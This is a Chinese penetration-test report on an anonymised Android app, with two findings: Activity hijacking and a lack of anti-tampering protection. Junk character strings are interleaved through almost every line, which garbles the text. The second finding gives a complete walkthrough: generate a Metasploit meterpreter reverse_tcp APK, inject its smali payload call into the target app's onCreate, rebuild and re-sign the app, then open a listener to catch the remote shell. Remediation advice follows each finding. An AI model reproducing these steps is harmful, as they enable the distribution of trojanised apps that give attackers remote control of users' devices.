" w+ u! |. A! J, _0 j
2 P( A8 M9 ? L* L1 D: v4 ^# j: c8 [
, Z9 q4 W4 L! _' L- P, e2 n! r& X$ n & s5 h/ z6 J. ~, h4 B- c2 z1 O
8 X; H8 O. m: c" @
' `1 w% N g! r" }, S' S" p& t' ^
% ] ^* A$ \ }8 s: l) ^ O5 _, n " P9 P B7 T- Q% X: @
6 \. I3 ^/ P) J( F0 J
! L; d/ m- V ?& O# r# Q0 t3 E
& Q0 x8 _# E7 {( K, c% v# d8 y
/ g! u3 U: U8 R6 u3 |1 R: K- C
3 ^* m3 H# u; n% d* m3 \ 表1-2 测试结果 + l8 Z0 {! j" K, f0 M+ r
b2 p W! z! a0 _) B
; d) o C1 h h5 x
+ n" l) S6 _; v1 P8 h2 V2 K! C7 [ ! o6 j6 [. U- o
. [8 L" |: f/ n% g9 h2 M! z 3 h7 U2 H- @1 \( I+ _5 P
5 S+ F5 y1 _. v+ ?, D
+ D, a C& w( e+ A' c9 H0 Z& X! X2 N5 p u4 x7 O8 m6 Q
0 f2 l* X) f3 I0 ]8 g: D4 p8 B! z, f3 S
2 检测结果
' |* S% F9 P! ?: B, M. a3 b" C P& r- Y% U8 W1 s
2 M' ^- a: W3 d0 ]& I. `8 ~# P; R
- A; d* k1 i0 f& ^
A4 g- h8 [4 A# M
, }* I8 D1 `; w( N t, e. l. B
2.1 某某某
7 U; S; Z7 w( ?, H* L5 ?
- f0 K- g( B0 ~0 K$ x2 V
! M2 a* P/ X' J: Q
, {1 C [ J( t: @
R7 R, ^3 _& C; j1 ^) I% A- b1 U, R4 @ l% T" \' F H
2.1.1检测目标
; Q2 o6 T$ `# d$ R. H h
/ n4 o8 ^ I- ]. O. Z- |
h# ^* F5 E+ ~/ R. J
& E+ {& A- M* Q( _ j0 d. A
V, D1 g/ V1 B
) ~; ~$ w- ]$ {6 q
目标地址: 某某某某某某APP 0 _$ s# @1 ^6 h& s. V
: O. C' r& p& |* f! ?4 G
1 m/ E5 D2 Y" m; a+ @
2 k) ?. d$ l% a
) r5 G8 t6 E* W- _# L' s/ B, L: v A: d+ U% w/ d
2.1.2检测结果 ! H% [% U T6 l6 S# L. D
) p3 F/ m9 R" c O, p, L+ [: c( P
6 k, j$ E6 u; j Q5 D' ~ ?2 d/ U- L' g5 w0 l$ s
7 n! k5 Q$ W# p- T, U! {& M( \" ^- I$ ~
2.1.2.1
0 N" g- }$ @& ?1 g% Q
8 T% L5 [0 p2 s k( R* {
: g7 ~3 t: L/ O" a6 w4 H, f
! z8 v- G' D$ G* m: u3 e, Y
( D2 D" i1 O% y3 j
# t7 d, G. ~& @% D
漏洞链接地址:某某某某某某APP
3 {- c- g! z w9 ]$ r1 `$ W1 y x' {0 B0 O ?4 G T
+ D* e7 X$ p$ W$ U; G# H
2 R9 L: R' Q5 f: W) ^+ r- c( j * u1 Z) c: R! N# A& [, [% w- W
& a( @( B" K, f* v X [7 V4 Z0 e. ]( i0 A3 N
( D' C% E2 O* i, _! S/ F
5 A' ~. Y* H' |7 O: g7 Y
. q, u/ r7 G& e 8 ~) [) e" q: ^+ ^- K
8 G. S& `4 Z, U. c# F. h2 A
漏洞分析及取证: 8 ]+ n: u0 L6 @% ^# S8 J! u, o
) D2 O3 ]# z' m) o$ h: \
8 n" n" z9 S# `+ x& K6 l$ X% Z- ], E# D' C( ?6 ~0 y
0 b9 P$ g2 K& y
# v2 m u* g& [+ V& `4 K
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
2 T8 Z7 i5 B! Z0 i
# O8 M. j6 z9 G) y/ `) P! [
- X" W$ }/ l D
6 R9 l& m8 k: w+ _$ H
" J- l# b! I, p8 Y3 U! c. Q
. l! b1 ~! A$ q _( `' Q _" D6 k! _ , r* k" B! P) P0 p. D" v4 K
# B5 I% ]+ C1 X+ S
0 h4 h- c2 A% j J- Q# U( k+ D6 {4 |) S9 a- C* Z7 B
: X K( ?- j; z; E( n
9 D% U, w" O! }7 U& }- V
+ g% J, g. @2 o; F! k9 O+ i/ O5 V; ^# I; t) r2 i9 ?
# W, ?3 S6 m2 q8 V; H1 a, A* m) f" q# p% m' T a
& [" X+ A3 L; @+ \* ?: ^2 _
& i, B+ j; H+ d( y6 @
7 M3 X* X- t9 d
7 o3 h+ }3 \1 f/ \$ b) p3 P
' @ V# Q% X) V4 _; N/ o; }* C$ `
5 |" X. Q% U, L3 q* ]- P
0 w: w; Y2 t( {% L: b0 A8 p7 f6 K0 K2 N
% F3 ^4 R t" ` T* L) E, Y* M6 P
! s1 {( N. E% D( q4 O J
p1 ]9 y1 ]( l& m9 [ \' E/ P1 W8 b/ k" c9 p
/ D2 ` t! R1 f; x4 \4 d6 H& K
) O! j( o% ^2 N* t6 _1 ?8 Z
: F, M2 F7 c! O& ]) l/ d, N+ x
9 J' q: l% z) c0 F
* `6 l, b+ H" {1 H& a* t
+ C$ @+ H" ^) v8 l& Y* A7 ` & N6 ^& L7 B6 R" c+ p
% f4 P& [4 I2 [, d6 M
漏洞危害:高 - ], M& m4 d; |# I# y# n
! j- x, [) e+ Q' s; a/ h& G
" i+ \/ X# {/ w- f9 ?+ |# `
* T+ t. V. A; S, c9 N
; |3 h5 A1 ]) K" x
$ y S$ T+ }% D6 _' p2 P & J' ]2 o0 w% t0 I! G: a4 g: B, I
: i8 x% H9 T; ~' c5 V 5 x, [4 w" {' ?& N% V- |4 L$ O
- k/ a8 E+ b+ z. b. X: ~ " u0 q# T' p3 i
4 a9 W, P. e) {/ }/ g2 n- h
3 H- i6 {0 _; ?: O2 \
% K, {- g9 T* m+ x( A5 T / N3 N* _; K I, A4 H! o6 E8 n
1 Z+ w9 T* }: P$ b% t
严重程度
( ^- F( H: x+ l: o- G' R0 D, k7 o% F1 S+ s5 W+ m# _6 v
% h3 T. X8 X# O1 L7 K; b! b
# P0 |4 V$ O1 c9 f/ A2 l. s
| : c; Y z/ M! J, n) h/ k
# s; k4 b; ?/ A. c3 l8 `
* Y$ N& K# p; \, \! N# q/ i! S z8 b
& \% I5 U" F7 b) g0 _! Y7 J1 _2 o' U* z6 V% H+ R( ^4 K
高 ; M& I l( H, s+ N: O* ~
8 i( C9 k/ |, L! A, j% [ " g! z' x: q$ D* {8 i" s) `
* D% c3 F$ Y6 ^/ E' h | $ G4 w% r4 L" w3 c/ T6 Z" h; o; U H
3 i+ j2 R8 r8 g- l 9 a/ k z2 u; k8 J4 `. x: |. c
% s4 K! C. o1 R8 K1 O! V
3 L! W [* I/ N5 c6 Z0 H: B
' i6 T$ p# \' t9 s ■ + f, N. t" l$ n" K5 ? L
4 b, ?/ \6 R" v8 F, ^1 ?( ~( ^
- |. w6 D( s3 P( v* }8 l
' [* H, ]9 L; f# j' C& I$ h: }. J | 2 I# [; n+ [ ~: V" t6 _/ d
9 R3 t' H: p) ?# _( d. i Q8 Z 9 p; W5 } g+ `
6 p1 f- N" G9 Z2 c
6 A2 Y& F! A/ S+ }0 K1 W/ z# F. q( y; H: w# q; o" u1 Q
中
) b9 W3 i5 [, A
6 v2 R6 ^( L9 P Q1 g H
+ j3 F% ^7 J# y0 Y) G
3 f$ n* O; |- H, i+ f |
% @) l8 u7 |& X; D$ a3 ~. V9 w6 i/ h5 M4 h2 J! T" a5 x
- R' O2 I0 m: r3 A, L* e
3 ] Q' a2 |( t/ R1 c, H ! K8 V3 a4 k8 U1 C% g
1 Z7 _, B9 G& }# D2 {
% L) i: e6 w) j" f# r
* U& g1 N- F+ ^1 R3 m. c
8 V7 E, Q1 m' }2 {# {
- e% L4 a3 ] B T- J9 [' k |
j- J! ^1 g8 }$ b. n8 D/ @% E3 o+ K( o& J
0 [2 ?$ S5 A* p
7 T* X4 [7 G, N/ C8 Q
( X/ C0 b1 T; w. I
$ f: H; ]9 J$ f* c9 z 低 : ~2 }/ A+ O* v
: a4 K: @3 d' K+ c4 F) Q. [
% S7 T* ~& C7 s- P
' u7 A1 f; @ l9 O' I' d9 u | " A; ?! W( Z: L/ o, t; [: H7 H9 }. I/ a9 y
$ m/ v% H) v+ p2 r$ @$ w
; u* c1 X" H! {$ C" N
% x0 i# h' H, {/ D } + f) Q' v" U: D' B
" I W) Q( b, E. X + d3 z2 ~# t q( m: q. |$ x
& e1 |; J0 K7 v# ~/ \
8 X$ Q" c+ F, D" J1 J8 s4 Q; x$ c3 A _
|
+ A$ z0 [/ O! x8 j) V/ L3 Z# O& {& P6 i- ~, h2 n
7 m, ~6 x( x& m- `# ?" D- S6 T% s/ Y% x
/ C8 |0 Q' u- K
( h9 H1 x6 F. B. Y& G8 k9 s
( n. S1 _" j" x& P& D
0 E9 b+ a: y: R/ n/ E
, ?. N* x; Z6 m, N
4 P% v9 T: T+ ?4 a9 |# l {: w& j; j5 D- n$ T! d6 W1 l- ^
# o; P0 v* q9 z' U# ~( h
' k3 D- q( v0 }% S( \- R) |# ^/ w# D3 ?; C) T; `* F
) w# Z" C* v% O. \6 U) O* F
A2 ?) x$ J3 S& u6 r4 i1 Y
- Y# L8 \( P( C
# d9 E2 o# ]3 |* M3 u 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
8 E( E" C! n1 D' x6 V& _ e' ?
: N+ W+ ~5 N, u" e# X! j
2 k) r t" u- d- n7 p7 i
1 i! a# U+ t; }; o 6 A* n! P, \* Y' w
% L, I3 y7 Q8 m
! R' v/ W" R2 t* B% i1 B" _, W/ M4 K9 t6 h& F
( F" m/ O+ m$ h- j5 v7 N- S: d1 q
- M* i, n6 B# E7 Y5 S: j
/ Z7 j, l5 B- z- c6 D/ I$ W
2 l7 v1 Z# i, ?; L- V6 F
t* P2 H8 N/ V2 ~4 U- l
; ^% C, o( J$ G1 a0 ?
c+ I$ y2 J. m y0 o I' t4 p
7 ^. B' w- H0 h/ g
" \/ P1 X6 Z0 P* ^
2.1.2.2 ( P$ b. E2 n6 o3 O6 p& C+ S
9 B+ L$ `( N+ k6 U
( ^9 D+ {' D! I6 x4 a/ a g/ ?
! ]+ Y% U' M- ?* z; I4 K$ _: K
/ _) P- ~4 Q h; |$ q3 J# ^6 n
4 Y) ]: j. j: X0 ^' ]3 K+ w2 ] 漏洞链接地址:某某某某某某APP - d, {$ d9 m3 z7 d
) v& V$ B! ]' z& s; k
& h' I8 c/ R, N- b& M# e
4 q) Z0 }- c2 S8 r
0 b( g- T, T0 l# l. Y
! J% _" H4 O3 O$ I! t, ?; \) o7 s 漏洞分析及取证: 6 P0 ^/ X4 z% ]9 j; v
0 f! q9 N, V* C6 O l- s
. H6 H% r# o: _8 P# W
; Z" L* U9 H! [' ?- o
# k% K$ L& R' q
. U; w- q- L0 r I! J6 S 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: * Z+ M4 N0 l% ~
& ?- o7 y* s# q) r
8 d. w3 ] d F2 G6 a, v6 B
& y% Q2 o, p, a3 ~
6 Q+ c/ R5 H; v; n2 V4 E+ ?
. b" L& P+ m# v; a& i 用Metasploit 生成木马 apk
& d* U5 f) {8 _* J* T" _
* g M' c6 f7 t( V! b
) \* W% B }, [5 X
/ r; J3 f; Y8 l- ` % x6 {" p6 K( ]- [1 R
3 r$ |5 E) s! V4 K# g. O
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 5 C; [( F5 f( a: a+ ]1 U
/ h0 x/ m$ G0 a. M1 }
: ?; @% L7 E: o' ^
* h) {3 w7 K5 O- x" w" A- y ) _. l6 E8 j0 Y- ?- `" L
- Z6 }$ l% G6 u) D/ |" m 反编译目标apk和木马apk
$ l. A9 l) V) X$ s
. [/ G7 W; a* j
( ~6 z+ H$ Z5 n7 W
. @; I8 ]7 x' ]) p4 J- L7 b1 M
0 m7 A. ^! b5 U i) W6 q
! }3 m8 C: Q2 u, X apktool d target.apk
% O4 s" g+ E! b Y) h: x1 J( M5 H; b0 j2 P
apktool d cockhorse.apk + ]" L9 ?+ p& ?+ V/ ^: a& |1 b# C
T' F( x5 q( t+ z. t0 q
5 @8 h: q7 Z5 `+ ^
) R" \6 P) [$ }( Q j
( f9 a; `' D5 R( }2 S
& |0 X" e, H" L/ `) D- Q; S4 M 木马 apk 注入目标 apk & i6 f7 }/ f6 {
' j) A- ~8 H0 G0 d
' p: _. t7 W+ @9 A3 ?2 u6 u& v/ j- |' F5 v5 Q2 ^. E7 f/ F# u
: ~; V0 x, m* v! m9 m$ h9 P
2 i: P; ~0 M% f! c' A 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
- B6 W5 R! q& G! ]$ d
$ L& t: v7 I) ?6 Y) H5 [. a, ? invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 5 _# \; R. c* X6 G
0 i6 W" y2 P, n1 K" j: S
) a; w, i; c- C `) C1 z* T: R4 e& @8 ^
2 w: T' d' h% Y8 g
" b4 s; Z) S! A# q) J- X
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
9 p: Q- a% K6 F! Z5 c( ~3 G" A3 I; o0 Y4 C' w
# l. ~# d* O/ T6 r1 D* v
' n- ]2 j3 y0 b" @ & t2 b. ~! {. e# V6 ?1 J* E9 z
" _- D+ E3 s7 p4 g0 | 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 9 Q& e' g N5 s$ S% E& g3 B
) d y9 q% B1 ^3 ]$ m# j
2 H; ?' v( p' \ T
z& K) r- m& d* e& q: r+ Q+ | " u3 _; _$ G: M) ~9 U. _
! D) [( ^) D$ i# p3 P0 h 回编译生成最终 apk
! g& t- t ^& V, [. _+ j7 q: s/ M9 q! f+ i a9 S4 O! Y$ z( ^
6 F; h6 Q1 A( U4 d
; M% G; v% z) r6 ~
/ x3 k4 x% f: J/ D* J0 b- W+ ^6 o, c4 X) h+ w, D0 O- \
重新打包 2 |4 e$ Q4 S6 z9 K: x! w3 U& w1 J; q
' U/ f, G0 |7 ^3 {) G7 f
9 L/ x3 w N0 `% i3 ?, T: I& ~; W
6 Z- ?9 J: w; ]) C( I7 r# L
% n' \1 G0 y$ E% J apktool b -o repackage.apk target_app_floder
/ t7 L- D1 o& x* E1 Q1 F6 x. I& x& \5 ?
, z. y& h& V& G: I* G; p( _
: D! P8 F0 z0 x# H3 u5 |
$ A4 e- e1 l* W x: D$ s. g! ], W6 j8 \& P7 Z/ H8 D' \. w
创建签名文件,有的话可忽略此步骤 6 P, s0 n0 B; K1 Z8 H. F7 F8 W
( ~ B1 T( r7 n. p& W! B+ ]
/ g: J. Q1 M, p' q; c7 }0 p+ q
4 O. ^3 v- ^; W9 F; i- j. |3 Q
6 l6 m# e/ h- ~# Q( E8 a$ z
1 Z3 [* a6 }. S2 M keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 . R' P0 \: C8 ]* s; U* C, T& } H
" O8 N( i9 J9 q4 e
! z/ ^! _7 @7 n7 [/ |( {) y1 t% t5 e
! ~8 E8 z" F7 [5 R6 z: Y9 b % h* j1 M" x8 l5 T# g6 X* K
^; T; R) b5 _ v5 V 签名,以下任选其一 - P8 s/ X& o/ N0 V% M
s5 P" y) Q- o% n
Y, u+ P3 m o4 L8 z+ X; K7 ]' |; V
5 }( t' [' h+ \ E0 S' ~* A/ {6 i$ O g
jarsigner 方式 p6 ^( S9 Y0 ~ [* L, P
2 E& z0 ^* ]" c1 A {3 J, i
/ s8 \4 R( S0 W" N* X2 E
% B8 J8 I$ a' {3 ~( t1 s7 \
1 K7 g" A0 w2 ]; @
2 o9 y4 V% x- d$ y
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
) J. W- {* h( E
+ U4 Z" u, }4 T- Z
" ~% h$ Y5 L8 j( `+ X4 e) S
' [# z& O7 @& D7 k" J& w
$ s" \, D1 Z B$ i/ Y: X5 Q! k5 W7 ]/ z7 J5 E% ]
apksigner 方式 2 [1 p/ h6 n8 A2 P
/ j2 K$ {, O$ ]( y2 Q& z" l+ h
L/ S( s+ [4 N! s+ I9 k4 x2 f" e }
% m' U e( r6 ?9 R6 H7 g4 F* J
+ V6 S$ n; _2 o6 P apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk ' f u, @ z" ?: `
3 V5 r) {0 G6 h1 O) w, d( o
- k9 H7 o( ~& |9 c. p* O m8 o3 M
) ^1 W% y. R: E# K* Q
9 P% `, s6 s5 \; h8 S
0 D4 `' K9 Y/ ?: V0 w" v2 k* [ 如需要禁用 v2签名 添加选项--v2-signing-enabled false 4 H9 f( Z) `( F, |* {
- E* y- f# U' X/ N$ J7 F
& C3 H z& }$ u# d( J3 k5 }6 i
9 P$ w/ p: D* H. M T8 r3 X; Y: C7 t
1 w: k' }+ y7 O$ L$ n) b J
& I! _2 j$ e, N) S. \ 验证,以下任选其一 0 Q. P( G2 F# G
, W, {8 I- m& H( G* H7 Y; A& M
, b% q) }7 Q+ |( x, B+ M) H: W: d3 X
d% Q, [" r# x3 S1 H
4 b8 i, N. \( T' H- H& [% }3 y; a% m" R+ u! O' w+ ?/ S+ f
jarsigner方式
4 v" R3 \; U% `6 @
" J7 O. r) x$ A! {
( {) @$ z# a+ @) T$ K+ r, s
8 h4 k1 o% u7 ?3 u- t0 C / f7 J' h# @' s: O! o1 ]! Q' }
7 l! w3 o! n# N7 i; ^ jarsigner -verify repackaged.apk
1 r0 ^$ c- z2 T( K% ]% k- a' A4 C0 m) D& {% Q' S' ?7 R* E" ^, O# y
2 Q1 X9 M& n. Q/ N* z2 x" v$ R
/ y4 b" [' W9 g3 R : C/ q2 E; y2 z$ K
i7 c1 w" `; V# ^6 |! F! g: P/ `
apksigner 方式 / w* G3 \3 h7 L, F% @
# ?9 [1 _, |8 H( D; z$ t, {
# u8 K! M4 }1 a3 d7 d; ~9 n. [9 `
7 z2 w$ T7 b2 o
9 r: I0 i, p3 v: x$ E& h! |" T9 l( N3 [( O8 J, j: c$ I
apksigner verify -v --print-certs repackaged.apk . B! t; V) O5 `
7 b4 Z$ x" \* R. w8 D- V# ]+ M& d
/ P+ [9 C2 u# p5 P7 q- M9 N
& ^" B m9 ?4 }8 E, V9 ?7 } 8 H3 k4 G3 E, G$ H4 H$ f
' ~, s* l! B: s0 d0 G. R
keytool方式
1 G8 M8 P% X: t( p
- |6 n8 \# Y- r, |6 F
! Q) Q/ @, ]9 x6 p# F! E0 ?
& i+ J! p4 y. u* W; q( G. o ! f* {+ l! F& ^( _
% N0 Y, ?; n; d/ l/ ?
keytool -printcert -jarfile repackaged.apk
5 r/ L7 Y+ E- l8 I: Z6 B. T. }( g6 c
. A6 Y+ k) A/ c, X7 f' j% G2 B9 ]2 x& J/ }
) s( @3 D! i) s7 V( P
2 e- |7 s7 q& f4 [, }. G6 n, ^
对齐 . M- w7 J# [8 h2 H
/ @$ {. C7 ]4 ?3 Q# s: s; }
" E9 C: K5 g6 o+ h5 q) X" F
8 H& E9 a6 H- \- d; P6 J0 D7 w " E. z2 Y& N6 s
' e% m5 w5 k5 l4 R 字节对齐优化 , p/ p9 {/ }: f8 b
Q" t" b. w V
+ ]" r- n% k* g3 a1 }4 e n8 j
5 F$ q3 N# m$ f: D6 X+ U
$ ]# w/ f& Z! K( y) r/ V9 U0 Z
/ v y3 L6 q0 }' O4 l4 k zipalign -v 4 repackaged.apk final.apk ' Y) [! L' j$ O O( A. ?# M+ \
3 N. [+ i! Z% U5 s0 X
6 m2 c$ {5 N0 ?3 U# r3 t6 f5 Y0 k( l
w' N$ ?1 B- h3 n3 Q1 _* w. H( c% d8 o2 K, ^. Z6 X
检查是否对齐 $ P9 m# h i" J6 M( c+ x+ s) {% @9 {
3 b6 G* W: y; J% j
& [# T! } ], s) O8 z
4 u7 P2 Q2 `$ z* |1 ^* K. H# |
9 L) r6 i: t) v7 |$ ?
8 t+ y& V' V% A) r1 }1 w" e zipalign -c -v 4 final.apk
& A* Z V5 }/ C: f
& ]" |' f6 b5 i/ Y) x
" `- i! D3 }+ o+ k
) Z" }7 ?% J6 g # G0 a5 a) f* D6 T
+ F- d5 \4 ~/ Z2 Q 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
+ l8 r7 j; @8 Q. N, u- c( Z6 ^! \0 g# o( D- t; B
. ^5 `. G4 V2 t W- G* P. i
5 A8 R& H# e: L3 i
) C* _) C: ^: S4 H& M
. T2 j6 U; o& v1 n0 V1 g/ Z7 U
启动Metasploit控制台,配置参数等待上线 . R2 B: _+ F6 d8 s
4 _4 ~* Q p2 ^9 P
! y% b) b" |- ?% t. [/ F. S' a- {
. i; o e/ F9 {2 e2 w
& w* Z; X! u1 ^
& H0 D& {! \# z5 _* ?& P 在终端依次输入如下命令 4 I1 y c- G+ f6 y9 L
! ~- v; B- _5 Q
* q- O/ L4 o9 l' h1 a
7 J! m( S4 n$ w0 S1 d* a, p 5 Q1 z7 A2 E: F/ @
( M {9 W; e" H+ |
msfconsole
8 M; r8 u5 O6 f7 W, @- X- R L2 P' d! l, M8 P2 M W' c
6 ~. k4 `. T" V% x) b/ R8 N
& ?- ~7 E" \/ j3 W
, f6 r0 _. g2 `4 f& r0 T5 e4 S" I6 V1 d' `* j, W
use exploit/multi/handler
/ O% G0 k8 ^3 @' t5 Q$ ^3 Y- E% Y8 Q4 p& g6 Z. l% c0 U2 `
?$ K6 ]* x' m& `0 T; {8 v4 P, g
. y1 a9 j$ a& I% _
6 H2 o4 x* u5 u& d* o: v$ @( T1 K o3 k) Y; w
set PAYLOAD android/meterpreter/reverse_tcp 8 U7 g1 q% t/ u0 i' P s* x+ u
9 x$ T$ E7 O1 t' Y- ^( b: D$ C
8 q. T" K {, D# E
/ l) \' J. ~' q8 } h
5 n) K" M* }) d1 p, y/ |+ L
! H1 R; ~7 N+ x set LHOST 192.xxx.xx.xx & f/ f. |# T4 _6 j( |; P+ ]
* G5 _6 y# L7 r/ Q8 t" U' C
% y( n0 p, \2 D3 p, J* @0 O$ ~
0 G6 Z2 J+ U) E
$ I/ t+ l: |# n# B& H$ a& k9 @' P: C) p: d% b$ L
set LPORT 4444 : K7 H& q7 {; u& H
8 m7 N' B- @4 ?1 m6 ^' c, u
0 l3 i4 G3 t- L' _
% K% o: l. M4 Z5 }) I " n) [5 ^/ o- U1 \
+ P, A4 p) ?% _8 Y" Z exploit
B% o8 e- V$ J7 k. k2 @& P X3 D4 O7 a4 m4 j) j/ n
6 i+ H3 g7 L) o7 A
3 H2 n- o% x9 G' Z
# C) b4 o2 f# m4 ~: n, o
6 |4 V+ @# D7 c% v& s' B 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: ' ^; o, p. ]6 w& j% y, Z$ L
$ E. M" }4 a# U5 t! ^* Q
: o6 K( w; B; W
; z6 Q m% o1 a4 x4 m$ E0 U0 k. O 0 i4 W/ a! V4 r2 {0 p+ y$ M) z& B" k/ j
4 C! r; s& S; j6 B( F3 ~
漏洞危害:中
7 ^4 _ ~8 l, K2 d* c; l' P
" l8 o* _# f2 n4 s1 F
0 H5 @3 |$ [1 T, ~. [
, C" M5 j) x2 ~7 S3 S7 B
& o0 E( e& |0 b2 p5 ]
/ `* x4 J" @7 Z& h. w9 T$ D
& ?6 ]) G0 A' w: h E. j4 t
- q! U* p/ m4 {8 u8 `3 @
1 s+ v* Z5 j9 `5 _- R9 w- b. u% v- V v! e* K$ x& _5 w/ ^1 b
\4 p! @& |: I: C3 v
7 N( a. F' K: \: }2 U 6 Q3 y4 x5 U9 [" N
/ [" G, u5 b/ x- T
0 f# F1 @; W) U8 p H* [8 B
5 d+ C% @ t; k' L, d- y
& W. T: H- \1 J0 G9 ]* T8 m3 }2 g: w3 k; q6 T
严重程度 . P0 e$ H5 {9 F# h
5 `" k: N% m9 E9 r. P1 {. c
2 @! v3 u8 j) l
, T* j, r. }1 }, j) V- q: N# _ | + g# y1 a# J |* \
4 ?. @7 K" \* p9 B& q. _9 ?* c
* J0 p: H1 N0 U3 i& J* @
. ^# r6 D& h- f2 V( X
; r2 N6 `% R6 E7 W1 k. p1 R
7 Q1 b$ Z/ S2 G" ~ ^2 ~ 高
! z# N( {; q2 n2 Y: X) b& B% {% M& `7 X9 q, [
& v3 [% A v; w q
6 R2 v+ f6 n8 E1 C |
: p4 h E) K. `+ D+ s: D8 h" F8 i" M- A0 M$ M
, N7 Q$ U' R( P9 n @6 l8 l/ a! v! o/ o% I! C, t, O1 q3 O# r, j
' B' _* P) w. }) `) U
3 o" N$ @4 `0 z* T ■
# v# H1 K" z1 C& s
, O Z1 d$ e# L) j& c7 O
. Y2 |" X- t4 L p X3 A, e+ r; g: ~' b( ~
|
& |0 |8 [* K W1 ^; ^# o
7 u5 ~* L" F/ J9 _$ A2 B 0 l( K/ P7 }' @! _$ i' E
( X/ N' l% f8 m, S' g0 ` ' I" B6 q) O9 w( x! D, c" ?1 p. y0 u
8 {. }+ `. D( v: b7 T5 u# R
中
& b' H; i1 K% ?2 F8 P
6 t) K; L$ [2 s0 N
/ F2 u; M6 M Y/ [: F6 A: [; k' O" U; h
| 8 _' u% d6 ^5 W' y, {) U" _
% H6 O6 I5 _( C/ q! M: B1 T$ R2 } ( F+ n; V5 m7 O& m6 @* |3 ]
+ R- Y5 Z& X# U9 Q
. f" [$ @+ {/ G- m
3 I6 L' W# u& f: w* V; [$ i/ k % C8 z" u; \" g& y: T, z
8 X7 D! N* D$ J4 Y$ o
2 e+ \) R. G' G8 j9 U3 Z0 L, @7 s4 |; F" i
( N5 ] B! m: T+ g5 N/ @3 e
# [" j8 X; ^- q/ e. ^3 B3 g' P |
2 `" Y6 n y) U& G4 y* a2 ?
( K# s7 `4 g& p! m x: e& V) H
# t1 C4 E( ?( J- d6 k5 [2 L4 a# g' V; H
6 M4 t( j2 D- f+ e5 {, C
: X r% Q- S1 B/ X e$ L 低 # C- @) [2 S; U# C1 W& t
R2 _. f, L: h0 p# \9 T
) {2 t8 I7 g' G R( I" \6 l0 x3 [" K8 [4 F
|
& Y9 N8 _5 i& \5 D/ x* W: N( x/ c" g
+ Q1 S( p+ O/ J9 Z8 z- D1 U7 D# _
e0 f) k, u8 H1 d3 {- V) N M* W: k3 x' V2 h; t3 V, P9 s q5 a
7 F `5 p" }- [ Y + |+ l( O' U- P: y8 ^
$ ]! E! _: W" P! B6 J" V7 G- l
$ R7 s i5 t/ z" `& V& M% P1 L7 s2 G A
' l, z) S' N/ m% L r& W2 D2 s- V4 q
/ {( e8 o6 `. ^+ B$ h8 T# \" Q+ \1 A |
% W( Y9 E2 n0 J/ N' }5 a3 H
, w/ l; Z! p1 w) s4 m; K7 w' [
5 T' b$ n; L9 J9 G% i
% S2 u7 a$ A! K, B
; y- {3 L' A; Y% X. A
4 @- ], L/ ?( \$ L1 f# a
/ C3 x, v) d r7 ?8 n% L5 ~6 Q8 ]/ ]- ? k
5 D+ X9 C3 o7 Z) Q8 P$ f: c" H1 x q
5 C$ g, `. `; k0 O
; g5 a/ ?" s$ W1 B% i3 {
p6 n: U$ v) L/ H& m+ L1 v
5 z( H/ ~6 ~* {0 Z" k
8 F* s+ g( l `; r4 j! U# M0 z$ i7 v
0 q7 b6 e8 N f9 S2 d7 _/ C
4 |7 A, q/ I$ w8 M4 U
# ~6 \; _5 _4 s; c/ s6 J$ X" r0 O0 r* V. S$ Q, a$ z$ X
修复方法: / e. t7 d3 B! f6 x0 x5 J- d( b1 j
, C1 E& Y# m# P4 {$ n
- W e9 _7 e% ]2 L: v, y1 B, s+ C J
$ Q6 n0 k: o5 D- E5 G) B
1 v$ C7 `0 w/ |+ q- ]' F
1.在 APP 启动时应做签名校验防止二次打包。
' q. ~) v% D. q4 q
( Z- I: a3 Q i* v1 i 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 & t+ B) X! H6 E0 \" e' V
5 U c7 D: B, Z) a. L
, k2 K! E5 l/ s7 g* [' [$ h" s2 b- \: i; e
6 ~9 J$ G% m7 X, ], h
' H2 {( L3 W" V. l( {
- U2 n' z6 X$ Q0 [% [9 k" a/ |
2 w5 Y5 v( y0 o7 F ! ^& {; q8 M1 Y+ [1 E7 ]
6 k# ^$ {+ O. _' T4 ?
$ l# ^$ j& a1 I8 F4 X- `+ k
0 m6 v) T: M# l. q% e1 [
' G# x: q+ F; k) F d1 r; _+ v! n3 A/ | e% A
1 r! I! X+ _; T0 ~* n
; }/ L9 }- }7 A- F' @
: X! G3 q% R2 K* H
! u+ T; R; Q( u7 F
+ w. s0 G) u. K8 _ w4 R f
) X h1 q- @9 F# W$ T4 _( X